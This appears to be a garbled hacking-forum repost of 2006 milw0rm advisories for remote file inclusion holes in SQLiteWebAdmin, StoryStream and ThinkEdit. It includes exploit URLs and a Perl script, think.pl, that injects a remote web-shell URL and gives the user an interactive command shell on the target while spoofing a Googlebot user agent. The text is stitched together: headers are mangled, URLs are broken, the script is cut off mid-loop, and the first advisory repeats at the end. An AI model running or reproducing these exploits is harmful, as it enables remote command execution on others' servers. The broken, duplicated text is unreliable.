################################################## #### # DeluxeBB Remote SQL Injection Exploit # # vbulletin Remote SQL Injection Exploit # ################################################## #### Navaro(HCE) SQLiteWebAdmin 0.1 (tpl.inc.php) Remote Include Vulnerability Code: SQLiteWebAdmin http://sourceforge.net/projects/sqlitewebadmin SQLiteWebAdmin is a simple PHP program for administrating a SQL DataBase. It suffers of a Remote File Inclusion Vulnerability. The bug is in the "tpl.inc.php" program in the "lib" directory, and is exploited when passing the parameter "conf[classpath]". http://www.server.com/lib/tpl.inc.php?conf[classpath]=[URL-OF-SCRIPT] Succesfull explotation, needs register_globals=on Att. SirDarckCat elhacker.net # milw0rm.com [2006-08-07] vns3curity(HCE) StoryStream 4.0 (baseDir) Remote File Include Vulnerabilities # Information:- # # # # Scripts: Storystream # # download : http://www.iwonderdesigns.com/downlo ta_0.4.0.0.zip # # Version : 4 # # Dork & vuln : download script and think # # # #================================================= ======================================# # Exploit : # # # #http://localhost/path/include/classe /EvElCoDe.txt? # #http://localhost/path/include/classe /EvElCoDe.txt? # Black_hat_cr(HCE) ThinkEdit 1.9.2 (render.php) Remote File Inclusion Vulnerability Code: ################################################################## ############################### # r0ut3r Presents # # # # Another r0ut3r discovery! # # writ3r [at] gmail.com # # # # ThinkEdit Remote File Inclusion Exploit # ################################################################## ############################### # Software: ThinkEdit 1.9.2 # # # # Vendor: http://www.thinkedit.org/ # # # # Released: 2006/12/08 # # # # Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) # # # # Note: The information provided in this document is for ThinkEdit administrator # # testing purposes only! # # # # Solution: # # Add the below code to the top of render.php # # if(basename(__FILE__) == basename($_SERVER['PHP_SELF'])) # # die(); # # # # Exploit: # # perl think.pl http://localhost /think/ http://localhost/cmd.txt cmd # # # # design/thinkedit/render.php?template_file= # ################################################################## ############################### ################################################################## ########## # Remote File Inclusion Exploiter # # # # This script attempts to exploit a remote file include vulnerability # # by inserting a web shell into an include statement. A shell is then # # spawned. # # # # Created By r0ut3r (writ3r [at] gmail.com) # ################################################################## ########## use IO::Socket; $port = "80"; # connection port $target = @ARGV[0]; # localhost $folder = @ARGV[1]; # /think/ $shellloc = @ARGV[2]; # http://localhost/cmd.txt $cmdv = @ARGV[3]; # cmd $vulnerable = false; $s = true; sub Header() { print q {Remote File Inclusion Exploiter - By r0ut3r (writ3r [at] gmail.com) }; } sub Usage() { print q { Usage: think.pl [target] [directory] [shell_loc] [cmd_variable] perl think.pl http://localhost /think/ http://localhost/cmd.txt cmd }; exit(); } Header(); if (!$target || !$folder || !$shellloc || !$cmdv) { Usage(); } if ($s eq false) { print "[-] Shell not found\n"; exit(); } # Check if the script is vulnerable and register_globals are on (if needed) $vulnc = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting \r\n"; print $vulnc "GET ".$folder."render.php?template_file=AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAA HTTP/1.1\n"; print $vulnc "Host: $target\n"; print $vulnc "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n"; print $vulnc "Accept: text/html\n"; print $vulnc "Connection: keep-alive\n\n"; while (<$vulnc>) { if (/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/) { $vulnerable = true; } } if ($vulnerable eq false) { print "[-] Target not vulnerable, or register_globals could be off\n"; exit(); } print "[+] Starting shell\n"; print "[cmd]\$ "; $cmd = <STDIN>; $cmd =~ s/ /%20/g; while ($cmd !~ "exit") { $xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting \r\n"; print $xpack "GET ".$folder."render.php?template_file=".$shellloc."&".$cmdv."=".substr($cmd, 0, - 1)." HTTP/1.1\n"; print $xpack "Host: $target\n"; print $xpack "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n"; . http://www.server.com/lib/tpl.inc.php?conf[classpath]=[URL-OF-SCRIPT] Succesfull explotation, needs register_globals=on Att. SirDarckCat elhacker.net # milw0rm.com [2006-08-07] vns3curity(HCE) StoryStream 4.0 (baseDir) Remote